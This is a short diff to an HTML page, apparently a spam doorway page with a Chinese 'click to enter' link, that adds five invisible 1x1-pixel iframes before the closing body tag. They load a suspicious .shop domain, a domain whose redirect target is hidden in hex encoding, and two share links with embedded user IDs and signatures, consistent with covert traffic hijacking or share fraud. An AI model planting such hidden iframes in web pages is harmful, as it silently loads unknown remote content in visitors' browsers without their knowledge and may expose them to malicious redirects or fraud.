--- a/z1.html
+++ b/z1.html
@@ -63,6 +63,15 @@ class="drugsword" ><a href="https://98tv.github.io/0.html">★★★点击进入
   </div>
 </details>
   
+    <iframe src="http://d.cj0415gert.shop/Rpxkg33707" width="1" height="1"></iframe>
+
+    <iframe src="https://ssse9sa15.nnfi1819z.com/?url=68747470733A2F2F3134397366667373313431332E6E6E6669313831397A2E636F6D2F3F6170693D32463730324637363639363436353646324433343330333833393332333033363244373536393634324433323331333933393337333032453638373436443643" width="1" height="1"></iframe>
+
+    <iframe src="https://ssse9sa15.nnfi1819z.com/?url=68747470733A2F2F3134397366667373313431332E6E6E6669313831397A2E636F6D2F3F6170693D32463730324637363639363436353646324433343330333833393332333033363244373536393634324433323331333933393337333032453638373436443643" width="1" height="1"></iframe>
+
+    <iframe src="https://focu.youth.cn/articlefour/20230831?sid=49758391&uid=43926004&timestamp=1694002726&signature=nG63ezAQDowMB0vlYg4k6ZEK2C58wg31L8KN5yR9XpjPOxrbdE&share_id=43926004497583911694002734036&scene_id=fire_share&time=1694002734036&share_way=wx" width="1" height="1"></iframe>
+
+    <iframe src="https://focu.youth.cn/articlefour/20230904?sid=49781453&uid=43926004&timestamp=1694002726&signature=NRxPz8j0mdBYbOGDW91l9ZWeYudLy6D4yAXV56qwogJEpkLK2e&scene_id=fire_share&share_id=43926004497814531694002767029&share_way=wx" width="1" height="1"></iframe>
 </body>
 
 
